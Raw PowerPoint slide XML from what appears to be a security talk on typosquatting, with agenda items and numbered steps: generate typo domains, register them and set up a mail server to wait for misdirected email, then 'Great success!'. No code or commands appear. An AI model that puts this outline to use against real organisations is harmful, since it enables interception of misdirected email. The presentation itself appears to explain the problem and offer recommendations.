            </a:solidFill>
            <a:ln w="38100"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1219170"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3763BA9A-85DE-47DA-AC96-1CD4CDCC9528}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="722112" y="157506"/>
              <a:ext cx="1038543" cy="496046"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1219170"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3A9BE-618E-44C8-98A6-37EF81230C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310106" y="3067193"/>
            <a:ext cx="2657138" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Generate the typos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{644861CF-2BEE-43F9-92E8-D4EAA00930AF}"/>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7873579" y="1578948"/>
            <a:ext cx="3867500" cy="542251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033916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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41169" r="1126" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2323" y="1486183"/>
            <a:ext cx="12194324" cy="8682415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776DEC76-6444-477A-9D7D-7ADB1691B8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622168" y="2045157"/>
            <a:ext cx="3959663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TYPO SQUATTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042E1155-793D-422C-889E-AF5B33DFAF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="1486184"/>
            <a:ext cx="4762501" cy="5811866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38EAD553-8E14-4677-9AC7-48B3DA948CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="333983" y="2957750"/>
            <a:ext cx="1224308" cy="594563"/>
            <a:chOff x="722112" y="155341"/>
            <a:chExt cx="1038543" cy="504349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Oval 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C013CE7B-A632-4334-8808-16D6C8725B9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="994840" y="155341"/>
              <a:ext cx="504349" cy="504349"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E31736"/>
            </a:solidFill>
            <a:ln w="38100"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1219170"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3763BA9A-85DE-47DA-AC96-1CD4CDCC9528}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="722112" y="157506"/>
              <a:ext cx="1038543" cy="496046"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1219170"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>4</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3A9BE-618E-44C8-98A6-37EF81230C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310106" y="3067193"/>
            <a:ext cx="3271725" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Register the domains &amp; setup mail server &amp; wait just wait</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F5BADAF-1EFB-4EC8-92E0-755FC94F0C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7593105" y="2171888"/>
            <a:ext cx="4395611" cy="355251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2365440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Montserrat Ultra Light" charset="0"/>
                <a:ea typeface="Montserrat Ultra Light" charset="0"/>
                <a:cs typeface="Montserrat Ultra Light" charset="0"/>
              </a:rPr>
              <a:t>Seconds out! </a:t>
            </a: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22" name="TextBox 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F90482EA-11AB-45B2-A960-F3D84341E299}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="239383" y="3664749"/>
            <a:ext cx="189465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Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="TextBox 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F459C4C6-1F71-403D-B96F-C44DA1491562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8373640" y="4496328"/>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Getting to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grips</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="TextBox 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88DA9458-EAEC-49CA-AA3F-4A72078E7BE2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1880864" y="4564862"/>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Important terms</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1A53DCD-F9F0-47C0-97F7-6F7B9F18F70E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6757419" y="3693361"/>
            <a:ext cx="189465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The future</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="TextBox 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0921E7-76F1-4D13-8341-EB05A67723A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3520771" y="3669527"/>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The security problem</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="TextBox 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9958980-F7ED-4E83-BF72-AB1D0F1F0B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5156265" y="4511996"/>
            <a:ext cx="1894659" cy="25391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A tool, not a solution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75F7928E-6A9E-49B4-8DB1-85C5E02D51C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9996617" y="3712126"/>
            <a:ext cx="209692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Recommendations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9C1CF53-01B8-4905-AF28-A99B592730C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="41169" r="1126" b="18058"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2323" y="1486183"/>
            <a:ext cx="12194324" cy="8682415"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776DEC76-6444-477A-9D7D-7ADB1691B8D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="622168" y="2045157"/>
            <a:ext cx="3959663" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>TYPO SQUATTING</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="18" name="Picture 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{042E1155-793D-422C-889E-AF5B33DFAF6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6">
            <a:alphaModFix amt="56000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7429500" y="1486184"/>
            <a:ext cx="4762501" cy="5811866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="Group 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38EAD553-8E14-4677-9AC7-48B3DA948CDE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="333983" y="2957750"/>
            <a:ext cx="1224308" cy="594563"/>
            <a:chOff x="722112" y="155341"/>
            <a:chExt cx="1038543" cy="504349"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Oval 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C013CE7B-A632-4334-8808-16D6C8725B9E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="994840" y="155341"/>
              <a:ext cx="504349" cy="504349"/>
            </a:xfrm>
            <a:prstGeom prst="ellipse">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E31736"/>
            </a:solidFill>
            <a:ln w="38100"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1219170"/>
              <a:endParaRPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="TextBox 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3763BA9A-85DE-47DA-AC96-1CD4CDCC9528}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="722112" y="157506"/>
              <a:ext cx="1038543" cy="496046"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" defTabSz="1219170"/>
              <a:r>
                <a:rPr lang="en-US" sz="3200" b="1" i="1" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>5</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="3200" i="1" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Rectangle 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3A9BE-618E-44C8-98A6-37EF81230C7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1310105" y="3067193"/>
            <a:ext cx="2262255" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E20714"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Great success!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="E20714"/>
              </a:solidFill>
              <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="30" name="Picture 29">
            <a:extLst>
